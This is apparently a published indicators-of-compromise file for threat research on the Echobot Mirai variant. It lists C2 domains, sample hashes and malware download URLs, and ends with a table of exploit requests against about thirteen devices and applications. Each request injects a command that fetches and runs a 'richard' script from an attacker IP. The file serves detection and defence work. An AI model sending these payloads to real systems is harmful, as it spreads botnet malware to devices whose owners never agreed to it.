Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 233 lines (222 sloc) 15.8 KB

IOCs for research published at https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

C2s

akuma[.]pw:17
akumaiotsolutions[.]pw:777

2019-10-28 : Samples hosted at 45.89.106.108

0d2fef6a2a50a9ac3430d1eb435a81d9ae2fe2e6d9949a2fa418d05c49df94f1
71613948d5599215c6cca58c996d95608c8c7163b4f831629453f2a70a69049f
72bb6fd09487111bc0281e1432e8d8e3f58ce279c20e41cec17b2bd91eacf68e

URLs

45.89.106.108/ECHOBOT.mips 
45.89.106.108/ECHOBOT.x86 
45.89.106.108/ECHOBOT.x86_64 

2019-12-03 : Samples hosted at 80.82.67.184

026d2c2f740a6ca0d73fc1e18fd86f4b224299847777a86d479265b08f6351d8
02f5366ad52ac72148add190ab6fb9541773694a895d00b1483e344a77d2f4b2
06388ff1e50bdea7e77b5fd1fd8cd01721610773e4f6e86e8c262fd408bd7c9b
0a961ea577777018c4641601c83a9f72811d61c5e91e56fbf1f35a7b37acce77
0fc24c7efdbfdf3f4623ce33a6e3424a176c5cb4a40b28ad99aaeeb1deae4403
136cd93f0871b87f186a07bbce0cb9d6a0e1bf22379a9b56ffe57d3a31c0275b
151bd119eb88a1f7696ef29edd38cfb32cb23dc289a374e5f79aa971c606fad8
18cf60774ce730d5c6aa5b1344e917fd6507fc61b40ac170a93141b96724b29f
1c81e5396df9e07e56789509fddbf1de5e2df23b7f1b88c0d8e81e733befc6d2
1ce18b3b649ef876f385ea086d6a45211412fdf5bb29336153c51ea0ccbbd164
1d6936a567a78fb4966e35f6e812f9fb09d30eff8f53107c64d1182013e443c0
1e03b45a3787dafc6fb4320f87822e271d6e91bf3f2536d7cfd9942d20b352e8
1e287986270b525fcc4de18168457e24709104b96371ea893883f9994c2f7935
1f01c7ca025e1c4264adc25639d62e7ab309890c96f02884f5b1b38a1d25c9da
1f972249316f48a81da6a2fc019f8fbaf9480e5d66a9415a069e370d5c68b97e
20f5efe32280f5f6c31d450e9b5cc02f57b7af8b211bf5fb3f501344a3d4d74e
245de32d9516264accf9bea3499752337a9c062b874bfd4d2cfa784abd6e0356
2a042e35b3132b38b91bf999f0e0ea67e3151c143b37094897068207765f7e32
32e99cf6e47c5148effd4d547d5267cb5e998046af9dcc0847835d17bd9ecd06
3444120d9a8d76011774aa4f74ec8b37be3b71f672ba6e6552f15bed3b1476f2
35138d8a2e7760cca08f5e4d95f684fd948a363739cf69d3f006ebe0825968c0
37d974628d42d7c77943a327762b9e056f36919361c43c3e98bc7573a4a6eafd
38d42fb72cdd6fa05d38893ddc5787c21c0f4e752c3901cf30c3b2de0d4340e1
3ca46737ecddde50fefebf94a6cd6005b3c11c0f017f3b95693506a14d15ca0d
3f09b6fd5c86edd7b66d62e21cd0075642f06286e23791eb357c46749968b7a1
3f1b093e3be49fd1c43ba3605d713abffdf76794064277ad41aafdd3811a9e34
3f6deb7ee261835806e1783f8c6c9aca803ec4dea80a8a9bcc432330af370e84
412343709e5866b8929ccd423d16843fef6c51dcdb992aebdd2014232fdf8aeb
419a2a16f85e377fd79ae6ed8caf1ccb0c7dec3dd14806e47ecc73bb38d0a935
42a2764d82bd1c64c99f7ea4ef2e364c7f42a01240ea1f1ce25c5b4633bc42cd
42c5f64d9b363691f59281b2950d3025343a056e5a5800c1eb60d6c2ac94d66d
43b32d0c61d325a29532224880160c68b276b512c56ceab764e2985e12fab966
45f7f7f98514d66b17c8ba1c57bd8714e84f5ca35f627ee987fb00491fc37b2d
56550775bd0997d37457cff3e35b24197e11783e7ec446d66ac4803f9db92f91
579dc9e54822233caff589955133e28f8a13993478144afce6a165a1393e7cc6
57e953a6e9e328cf43ddac6132535b790c6b199cdba21e32d74af2685ffc9dea
57f12fec8dd46497bb4fb06c20de3da8110bd27f4e861918260f4deff13aa82e
5c685757e1ca656d6b27bd33feadaad36f6fdf4f9b8d005fe5577875f2214f3f
627f9d359e4bc806d039f549f09a49e23f43dc52775cf251aa51799ff68487cd
683e40608342129af0e80a9f65f2ec65b0605da38d9bf1f607147b9ad9930f65
691198ef222297d849dc132dfe43148c02e49e6d1e4a0ce75e30815a4d89f17f
6c0b966a5aeb37a510ee8c230d768257687bc35b82c9bd3d7858c96d51ee9f86
6d8905492dc5ef22515636cbfa7e91f0b8806a00635983aefaf1d879ef964016
748fc6949889f4fd781adfdf907ab8bb5860f249e835de8888d9fc5d63427714
7d48eb9d355fba832f9b894b31b21632222cf9d582749a8cbcb03899a2f6cc88
8484300b5c0f8273b4cda0aaf03779624e96d9a4243bafc40e7be69421582031
849ad7b980f2786701b7495e977d7b0e807039327e1920002b2381e10879eb02
8fbfc326cea95a058927ed63a35ebc64cdd69f6634df6de8cc5ac83d2fa6c9fc
9065217d1313bf67b45f90470e4650e5412a86aa753922586de1f77f2e56c377
91cdc07a4c5e24524ba1ea9f4407a43e29a48c4bf339cdf333ffd4b978edef34
93ca1ca3ca765f8c76353ff0bef895736f6e5ed2a06966750c6a342b12bd552b
969e1b83ab7c47333d519f6bebf6b1038e42110151fa687a3882ed0e4920c588
9ba763d2724e12342938783f459d34d62cdc3f1f9890aeab98e77dbb6b7ae63b
9beb5ef3158632eccb417ae482e937deb744255a9599884303ca6c5b72591af9
9d945733ae09bd16bf20ab4aa625cd9fddabf6c0b1b9fc1317f6ab6e865fcfc3
a1650983b2c8583f974254be74aefeb420c832627e34842c5515e019c2c43a24
a9539cb6df65adcf1bcb11bbed17af2f2d5c9ed568357dcbb7918530da1bda93
a967b1d66940b99b125fd44401dd744280234b41be81e7d7ade4c5518d7c9d8b
ae3411019f70f162f45aaf1554e332612b84594e2ae83aab7779846408cdaa52
b1524b398a1f35737b67624de9c3322e35ef6ed59029cb5362d0e433e2287f8d
b4c6bd52c267cbe7ddfe9d7344bf0db1e88d2affbd745011dc96190cf27ee124
bab03a9e8507e6645a311e5a8e61b9ade4a790ab2d6bf260eaeac665d0f4aa4d
bafe600c7da671bd2af169de83f58566d00389dac314aabb6c977da6f7bd4868
bb1009c308135718ff3025cb2308cff76fa9def2125231fd76726218111162e3
bcbd0894747d01dc4f0f10ca96c16c9e58872f70f79fe3c108ee62e42bea5181
c061bd4e4ca07b85a32c423de5ebc7c87fb05b7d407635aa795ff54d6e3fdba9
c2003e173c7520d84ad20196167fa651402c7a55272268ad51de4cf23d8fbf6c
c4824608fe03b105e58aed1f7a5ab2baa67c33aa2bc7d502dd4570b9036b3fea
c84f8634f92c80c990d4659463f7867acfee236580b0470fb1ec3890d133f07f
cfdc6344dc20d9936191bbcfe50f9b6728cdcc22b29d60a2d7cc6214df0c0541
d38aa184c943a7138735e0717c64fc1559c683c0c126cd34ba1d81d5a71fa90e
d6c861e459e6cbcd2813b41e36c95b0467e0d1838dbc9c44921bee3ff8bda541
d979f9b7e9dd915aedc540fb55c082bb5ba2eafe97f380706cc55e6473768542
de9355be1096ad8846f58a177992b0fc64d967d77c8a14e90995df6988f3acd4
df689914f74d08276098c0dc9f5696c15dbf0d07894a43e3e118d95685655b49
e65dc5fa3043754c680f1ee3914b817b22ce6d0c8e78c31a2a0edce63b19f90f
e6a2c852c247c93ade32b44f4b1744640120186689e45ea5340c83dcae0d7710
e7a0aee9237b68b70b790b3a8f02bdc3ebd3c14edffd41028efe242389e1f87d
e97d827dd8db04d91c0a62f806ac709f542304dd3f3f5fa3a6050f9009e54a27
eb8bef32b51c168bffd6d70c16264549b9a881a17d4ae167ab325dbf73681d14
ecfe82f39b84aa4b3b3a813b6bb4f7d3fa634cefec4dcc34ceac5635a3fc098f
f32163bb68f260a48a3da8d0135b077b12099e9f43fef780d4d67d2eb46e02c3
f4ee72bd765ad7623da2d6e32a1946d99a2d4315c8d0f2e80a1886e39a7119fc
f565386a180fd38c95a3188a26046c411be212cd638ebf3b97c48cba56033f38
fa237ad81f2320079f889a4e6d4ac2d39a086b5929fce73271a1fffb0af51212

URLs

80.82.67.184/richard
80.82.67.184/ECHOBOT.arm
80.82.67.184/ECHOBOT.arm4
80.82.67.184/ECHOBOT.arm5
80.82.67.184/ECHOBOT.arm6
80.82.67.184/ECHOBOT.arm7
80.82.67.184/ECHOBOT.i486
80.82.67.184/ECHOBOT.i686
80.82.67.184/ECHOBOT.m68k
80.82.67.184/ECHOBOT.mips
80.82.67.184/ECHOBOT.mips64
80.82.67.184/ECHOBOT.mpsl
80.82.67.184/ECHOBOT.ppc
80.82.67.184/ECHOBOT.sh4
80.82.67.184/ECHOBOT.spc
80.82.67.184/ECHOBOT.x86
80.82.67.184/ECHOBOT.x86_64

2019-12-04 : Samples hosted at 80.82.67.209

1d93e71ba831dc9eaba0afa3a40a9f0941c3661416a792c572a93584214206e0
31772935606f31f05489598c14a268930a3b5ef502d8c680a0ea9847e5474b8a
4283dc101f842c4760765383e6f851d74c90ba3816a43a83324fca13b07fa057
440d6d13ea7cd7b96aedb777c484d71613cb6ceb52601b4e357d6c714af8f4ca
53ec0c42a80a68173773547a257935cb39048961c2f60daa8f2ed3ee08d8a07d
62f7cee9669e2c6786f8ced410995320e8b39364eda24c77d5f09388933cb45f
6b0cb03d6a747dc9477bba22a9a53dfee6da787c2b221e69d07e619d2684af06
7dc274e608e9dc80f4680e8d43be7c846739faece288ce61dabe1b2d74f5df2e
8b232b29233af8d10d8e68f0fae7527a48b4be9436b5074bd9da325510514580
962f56b2e4fab4fdb60ecc9c2e603033625a87e34f996be1303f0fa1682a1bc8
993c4147a53d13f56da5d300706f006bcab113832bb138a7b775f4957680c643
9d5552e1581c360737c4aed6166968b256331cc44d9a87aef6524d9b0e8e1ac6
ac8b45be4aac5524a33705ec3e937494854f8f41ed72557aefc71d542f37c4d2
c2c33c03663c1e465cb6a9a83237e43568cd2f474aa02bab6e17a40f59f5a11d
db6b853e753a84e03626a7498b77e3ffc8d666086165641eb6eee500ee7d2791
e2fe4c1adfbda326c0c6ef52e26ffbc64bee484ad264e3089bc3b4af076d6697
f8dbaa1204a153d20ffa25d07bb2f4467b8581063307671306e87bb7abccd2ac

URLs

80.82.67.209/richard
80.82.67.209/ECHOBOT.arm
80.82.67.209/ECHOBOT.arm4
80.82.67.209/ECHOBOT.arm5
80.82.67.209/ECHOBOT.arm6
80.82.67.209/ECHOBOT.arm7
80.82.67.209/ECHOBOT.i686
80.82.67.209/ECHOBOT.m68k
80.82.67.209/ECHOBOT.mips
80.82.67.209/ECHOBOT.mpsl
80.82.67.209/ECHOBOT.ppc
80.82.67.209/ECHOBOT.sh4
80.82.67.209/ECHOBOT.spc
80.82.67.209/ECHOBOT.x86

2019-11-12 : Samples hosted at 145.249.106.241

0e87d4a97b64beb7fe27e0b21d73eb0da353467d99710566dda8b07f953798ef
0dafdb7fec814a39e1ae7f069e4044a32387eefcfa8fa0963dcc9a51a7d64738
1f23ddd77881a8cc95587b91c91fcf71175efafafd9b5b08c12a7e81c18ff378
23ff9c0f3baab717c9753604235a1069c15a5fd9b2f1a626889d7e56186dbe48
27b52808bf086a896417fd450ce4e14dd102894332270f7d6e63701cfe9d829f
4ccb9683182b2c8512b12ffa1dbdf22dbad8e5cbc3bb9efb85fe3c6f2b19cba3
69686943bdc941843562f3818c5cdce718d22184f2c1447f7fed5875e67c3df8
6a58e30de7842d7c30398c24395ae02762b8b7e3598bb8d2915299ee6bee7b02
886d6c4b7d952830184c2bcb95242db006e5f2cbbbc7757516efd5c4c48eba16
927dd0597dab45d2d507715eb79342e0989e5492b0e27c1681bb88392ac29262
9d0dc6705ca42183ebe0fa766d453ee90d68e38b6d6cf5745cf550ea5f2b372c
a7135a4c38e82f6e2d1ebd79166e457bdad42fc3085d614df3f9cbd033a7346a
a96515f745f07be9a512a2d0502c59b5ee2ef8d14ff0adaab3558e97d616c017
c8992488a49544762eababe5cfbf5304b770c48cd5e8ae47aa71d3a013c114af
c93f08a29512132ba8ac44092613fe6a8e9e192c8155cbbd62b28823b718f7e7
db4a5bf82bffa1a5c4444facbdbf4f1c6938a7e0227c9740b3780c8659802cc0
e0f2273b695a0579bb528eaa0d389a01e9fe5e1c458aa784433d7e23b9f56e74
ef5fcc5391f580ed91745b0678ee4c605e65bde3fad5e434f89372445f9a5a64
f2a6fe948e8dfac06cfbe9612c550e6b14c27d97b16dabd67db44a9ce2e22715
f7568d22f7cb83f5587ced9eac15c850ea9f0a552252fe40c38369e9b17d21b7
f862064c0c3eaa0d04261c3627e6aec28bdbea2b6b34bdb9d3fdfe416c9d13f3
ff12aa1ff47df05aa245b02d942bb89bdcf065b4eef4b6fcc4e28af1b77e5369

URLs

145.249.106.241/richard
145.249.106.241/ECHOBOT.arm
145.249.106.241/ECHOBOT.arm4
145.249.106.241/ECHOBOT.arm5
145.249.106.241/ECHOBOT.arm6
145.249.106.241/ECHOBOT.arm7
145.249.106.241/ECHOBOT.i686
145.249.106.241/ECHOBOT.m68k
145.249.106.241/ECHOBOT.mips
145.249.106.241/ECHOBOT.mpsl
145.249.106.241/ECHOBOT.ppc
145.249.106.241/ECHOBOT.sh4
145.249.106.241/ECHOBOT.spc
145.249.106.241/ECHOBOT.x86

Exploit formats

Vulnerability Affected Devices Port Scanned Exploit Format
CVE-2019-17270 Yachtcontrol Webservers 8081 GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
CVE-2019-18396 / CVE-2017-14127 Technicolor TD5130v2 and Technicolor TD5336 routers 161 GET /mnt_ping.cgi?isSubmit=1&addrType=3&pingAddr=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&send=Send HTTP/1.0
AVCON6 Remote Code Execution AVCON6 video conferencing systems 8080 POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
CVE-2019-16072 Enigma Network Management Systems v65.0.0 80 POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard;/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.1
Host: %s:80
{"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://%s/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
CVE-2019-14931 Mitsubishi Electric smartRTU & INEA ME-RTU 80 GET /action.php HTTP/1.1
Host: %s:80
{'host' : ';cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard&PingCheck=Test'}
Sar2HTML Remote Code Execution Sar2HTML plotting tool for Linux servers, v3.2.1 80 GET /index.php?plot=;cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
CVE-2017-16602 NetGain Systems Enterprise Manager 8081 POST /u/jsp/tools/exec.jsp?command=cmd+%2Fc+ping&argument=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%7C+whoami&async_output=ping1487856455258&isWindows=true HTTP/1.0
CVE-2017-6316 Citrix NetScaler SD-WAN 9.1.2.26.561201 devices 443 POST /global_data/ HTTP/1.1
Host: %s:443
Connection:close
Cookie:CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;
CVE-2013-5912 Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995 80 GET /VhttpdMgr?action=importFile&fileName=cd /tmp; wget http://45.89.106.108/richard; curl -O http://45.89.106.108/richard; chmod +x richard; ./richard HTTP/1.1
ACTi ASOC2200 Remote Code Execution ACTi ASOC 2200 Web Configurators versions 2.6 and prior 80 GET /cgi-bin/test?iperf=;cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
3Com Office Connect Remote Code Execution 3Com OfficeConnect routers 80 GET /utility.cgi?testType=1&IP=aaa || cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
CVE-2006-4000 Barracuda Spam Firewall versions 3.3.x 80 GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|cd; /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1
CCBill Remote Code Execution CCBill Online Payment Systems 80 GET /ccbill/whereami.cgi?g=cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

GET /cgi-bin/ccbill/whereami.cgi?g=cd /tmp; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; ./richard HTTP/1.1

Other exploits in this variant have been mentioned in previous publications here and here.

You can’t perform that action at this time.